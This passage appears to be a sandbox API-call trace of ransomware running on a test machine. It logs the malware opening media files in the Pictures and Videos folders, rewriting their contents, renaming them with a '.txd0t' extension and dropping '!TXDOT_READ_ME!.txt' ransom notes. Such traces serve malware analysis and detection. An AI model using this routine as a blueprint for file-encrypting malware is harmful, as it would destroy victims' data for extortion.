dwMilliseconds=0x3e8) returned 0x0 [0075.831] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg" [0075.831] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t" [0075.831] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t") returned 0 [0075.831] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg", dwFileAttributes=0x80) returned 1 [0075.832] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ai_vkhzc7sqq7bsy5rs0.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0075.832] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=19050) returned 1 [0075.832] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.832] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0075.832] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffb396, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.832] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x4a60, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x4a60, lpOverlapped=0x0) returned 1 [0075.833] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffb5a0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.833] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x4a60, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x4a60, lpOverlapped=0x0) returned 1 [0075.833] FlushFileBuffers (hFile=0x460) returned 1 [0075.884] GetProcessHeap () returned 0xe30000 [0075.884] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x112) returned 0xed16a8 [0075.884] StrCpyW (in: psz1=0xed16a8, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg" [0075.884] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg") returned="ai_VKHzC7Sqq7BSY5RS0.jpg" [0075.884] StrCpyW (in: psz1=0xed16e2, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0075.884] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\!TXDOT_READ_ME!.txt") returned 1 [0075.884] GetProcessHeap () returned 0xe30000 [0075.884] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed16a8 | out: hHeap=0xe30000) returned 1 [0075.884] CloseHandle (hObject=0x460) returned 1 [0075.885] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\ai_vkhzc7sqq7bsy5rs0.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\ai_VKHzC7Sqq7BSY5RS0.jpg.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\ai_vkhzc7sqq7bsy5rs0.jpg.txd0t")) returned 1 [0075.886] SetEvent (hEvent=0x3f8) returned 1 [0075.886] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0075.891] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg" [0075.891] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg.txd0t" [0075.891] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg.txd0t") returned 0 [0075.891] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg", dwFileAttributes=0x80) returned 1 [0075.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\g_pwwk0dwhdivj7tq.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0075.892] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=92440) returned 1 [0075.892] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0075.892] WriteFile (in: hFile=0x468, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0075.892] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffe94e8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.892] ReadFile (in: hFile=0x468, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x16910, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x16910, lpOverlapped=0x0) returned 1 [0075.894] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xfffe96f0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0075.894] WriteFile (in: hFile=0x468, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x16910, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x16910, lpOverlapped=0x0) returned 1 [0075.894] FlushFileBuffers (hFile=0x468) returned 1 [0076.271] GetProcessHeap () returned 0xe30000 [0076.271] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10c) returned 0xed2e18 [0076.271] StrCpyW (in: psz1=0xed2e18, psz2="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg") returned="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg" [0076.271] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg") returned="g_PWWk0DwHdiVJ7TQ.jpg" [0076.271] StrCpyW (in: psz1=0xed2e52, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.271] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\!TXDOT_READ_ME!.txt") returned 1 [0076.271] GetProcessHeap () returned 0xe30000 [0076.271] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2e18 | out: hHeap=0xe30000) returned 1 [0076.271] CloseHandle (hObject=0x468) returned 1 [0076.367] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg" (normalized: "c:\\users\\fd1hvy\\pictures\\g_pwwk0dwhdivj7tq.jpg"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Pictures\\g_PWWk0DwHdiVJ7TQ.jpg.txd0t" (normalized: "c:\\users\\fd1hvy\\pictures\\g_pwwk0dwhdivj7tq.jpg.txd0t")) returned 1 [0076.369] SetEvent (hEvent=0x3f8) returned 1 [0076.369] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0076.411] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi" [0076.411] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi.txd0t" [0076.411] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi.txd0t") returned 0 [0076.411] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi", dwFileAttributes=0x80) returned 1 [0076.412] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi" (normalized: "c:\\users\\fd1hvy\\videos\\42onoq2vrbixgpotlyl.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x46c [0076.412] GetFileSizeEx (in: hFile=0x46c, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=101800) returned 1 [0076.412] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.412] WriteFile (in: hFile=0x46c, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0076.413] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffe7058, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.413] ReadFile (in: hFile=0x46c, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x18da0, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x18da0, lpOverlapped=0x0) returned 1 [0076.415] SetFilePointerEx (in: hFile=0x46c, liDistanceToMove=0xfffe7260, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.415] WriteFile (in: hFile=0x46c, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x18da0, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x18da0, lpOverlapped=0x0) returned 1 [0076.415] FlushFileBuffers (hFile=0x46c) returned 1 [0076.417] GetProcessHeap () returned 0xe30000 [0076.417] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10c) returned 0xed2788 [0076.417] StrCpyW (in: psz1=0xed2788, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi" [0076.417] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi") returned="42OnoQ2VRBixgPOTlYl.avi" [0076.417] StrCpyW (in: psz1=0xed27be, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.417] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\!TXDOT_READ_ME!.txt") returned 0 [0076.418] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\videos\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x468 [0076.418] WriteFile (in: hFile=0x468, lpBuffer=0x37ff474*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff470, lpOverlapped=0x0 | out: lpBuffer=0x37ff474*, lpNumberOfBytesWritten=0x37ff470*=0x2, lpOverlapped=0x0) returned 1 [0076.419] FlushFileBuffers (hFile=0x468) returned 1 [0076.421] WriteFile (in: hFile=0x468, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff470, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff470*=0x7f0, lpOverlapped=0x0) returned 1 [0076.421] FlushFileBuffers (hFile=0x468) returned 1 [0076.422] CloseHandle (hObject=0x468) returned 1 [0076.423] GetProcessHeap () returned 0xe30000 [0076.423] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed2788 | out: hHeap=0xe30000) returned 1 [0076.423] CloseHandle (hObject=0x46c) returned 1 [0076.425] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi" (normalized: "c:\\users\\fd1hvy\\videos\\42onoq2vrbixgpotlyl.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\42OnoQ2VRBixgPOTlYl.avi.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\42onoq2vrbixgpotlyl.avi.txd0t")) returned 1 [0076.426] SetEvent (hEvent=0x3f8) returned 1 [0076.426] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0076.429] StrCpyW (in: psz1=0x37ff480, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4" [0076.429] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4.txd0t" [0076.429] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4.txd0t") returned 0 [0076.429] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4", dwFileAttributes=0x80) returned 1 [0076.429] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\e10w7bi-yn9p\\cdqnx.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x468 [0076.429] GetFileSizeEx (in: hFile=0x468, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=33599) returned 1 [0076.429] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.429] WriteFile (in: hFile=0x468, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0076.430] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff7ac1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.430] ReadFile (in: hFile=0x468, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x8330, lpNumberOfBytesRead=0x37ff440, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff440*=0x8330, lpOverlapped=0x0) returned 1 [0076.431] SetFilePointerEx (in: hFile=0x468, liDistanceToMove=0xffff7cd0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.431] WriteFile (in: hFile=0x468, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x8330, lpNumberOfBytesWritten=0x37ff444, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff444*=0x8330, lpOverlapped=0x0) returned 1 [0076.431] FlushFileBuffers (hFile=0x468) returned 1 [0076.434] GetProcessHeap () returned 0xe30000 [0076.434] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x10a) returned 0xed28a0 [0076.434] StrCpyW (in: psz1=0xed28a0, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4" [0076.434] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4") returned="cDQNx.mp4" [0076.434] StrCpyW (in: psz1=0xed28f0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.434] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\!TXDOT_READ_ME!.txt") returned 0 [0076.434] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\videos\\e10w7bi-yn9p\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x460 [0076.436] WriteFile (in: hFile=0x460, lpBuffer=0x37ff474*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff470, lpOverlapped=0x0 | out: lpBuffer=0x37ff474*, lpNumberOfBytesWritten=0x37ff470*=0x2, lpOverlapped=0x0) returned 1 [0076.436] FlushFileBuffers (hFile=0x460) returned 1 [0076.439] WriteFile (in: hFile=0x460, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff470, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff470*=0x7f0, lpOverlapped=0x0) returned 1 [0076.440] FlushFileBuffers (hFile=0x460) returned 1 [0076.441] CloseHandle (hObject=0x460) returned 1 [0076.441] GetProcessHeap () returned 0xe30000 [0076.441] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xed28a0 | out: hHeap=0xe30000) returned 1 [0076.441] CloseHandle (hObject=0x468) returned 1 [0076.446] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4" (normalized: "c:\\users\\fd1hvy\\videos\\e10w7bi-yn9p\\cdqnx.mp4"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\cDQNx.mp4.txd0t" (normalized: "c:\\users\\fd1hvy\\videos\\e10w7bi-yn9p\\cdqnx.mp4.txd0t")) returned 1 [0076.446] SetEvent (hEvent=0x3f8) returned 1 [0076.446] WaitForSingleObject (hHandle=0x3fc, dwMilliseconds=0x3e8) returned 0x0 [0076.448] StrCpyW (in: psz1=0x37ff470, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi" [0076.448] StrCatW (in: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi", psz2=".txd0t" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi.txd0t") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi.txd0t" [0076.448] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi.txd0t") returned 0 [0076.448] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi", dwFileAttributes=0x80) returned 1 [0076.449] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi" (normalized: "c:\\users\\fd1hvy\\videos\\e10w7bi-yn9p\\yd6z6s-cugg\\6hali.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000080, hTemplateFile=0x0) returned 0x460 [0076.449] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x37ffa28 | out: lpFileSize=0x37ffa28*=12500) returned 1 [0076.449] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.449] WriteFile (in: hFile=0x460, lpBuffer=0x37ff70c*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x37ffa24, lpOverlapped=0x0 | out: lpBuffer=0x37ff70c*, lpNumberOfBytesWritten=0x37ffa24*=0x200, lpOverlapped=0x0) returned 1 [0076.450] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffcd2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.450] ReadFile (in: hFile=0x460, lpBuffer=0x2ef0020, nNumberOfBytesToRead=0x30d0, lpNumberOfBytesRead=0x37ff430, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesRead=0x37ff430*=0x30d0, lpOverlapped=0x0) returned 1 [0076.450] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0xffffcf30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0076.450] WriteFile (in: hFile=0x460, lpBuffer=0x2ef0020*, nNumberOfBytesToWrite=0x30d0, lpNumberOfBytesWritten=0x37ff434, lpOverlapped=0x0 | out: lpBuffer=0x2ef0020*, lpNumberOfBytesWritten=0x37ff434*=0x30d0, lpOverlapped=0x0) returned 1 [0076.450] FlushFileBuffers (hFile=0x460) returned 1 [0076.452] GetProcessHeap () returned 0xe30000 [0076.452] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x122) returned 0xe9b648 [0076.452] StrCpyW (in: psz1=0xe9b648, psz2="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi" | out: psz1="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi") returned="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi" [0076.452] PathFindFileNameW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi") returned="6HAlI.avi" [0076.452] StrCpyW (in: psz1=0xe9b6b0, psz2="!TXDOT_READ_ME!.txt" | out: psz1="!TXDOT_READ_ME!.txt") returned="!TXDOT_READ_ME!.txt" [0076.452] PathFileExistsW (pszPath="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\!TXDOT_READ_ME!.txt") returned 0 [0076.452] CreateFileW (lpFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\!TXDOT_READ_ME!.txt" (normalized: "c:\\users\\fd1hvy\\videos\\e10w7bi-yn9p\\yd6z6s-cugg\\!txdot_read_me!.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x47c [0076.452] WriteFile (in: hFile=0x47c, lpBuffer=0x37ff464*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x37ff460, lpOverlapped=0x0 | out: lpBuffer=0x37ff464*, lpNumberOfBytesWritten=0x37ff460*=0x2, lpOverlapped=0x0) returned 1 [0076.453] FlushFileBuffers (hFile=0x47c) returned 1 [0076.455] WriteFile (in: hFile=0x47c, lpBuffer=0x84d840*, nNumberOfBytesToWrite=0x7f0, lpNumberOfBytesWritten=0x37ff460, lpOverlapped=0x0 | out: lpBuffer=0x84d840*, lpNumberOfBytesWritten=0x37ff460*=0x7f0, lpOverlapped=0x0) returned 1 [0076.456] FlushFileBuffers (hFile=0x47c) returned 1 [0076.457] CloseHandle (hObject=0x47c) returned 1 [0076.457] GetProcessHeap () returned 0xe30000 [0076.457] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9b648 | out: hHeap=0xe30000) returned 1 [0076.457] CloseHandle (hObject=0x460) returned 1 [0076.458] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi" (normalized: "c:\\users\\fd1hvy\\videos\\e10w7bi-yn9p\\yd6z6s-cugg\\6hali.avi"), lpNewFileName="\\\\?\\C:\\Users\\FD1HVy\\Videos\\E10w7BI-yN9p\\YD6Z6S-cuGg\\6HAlI.avi.txd0t" (normalized: 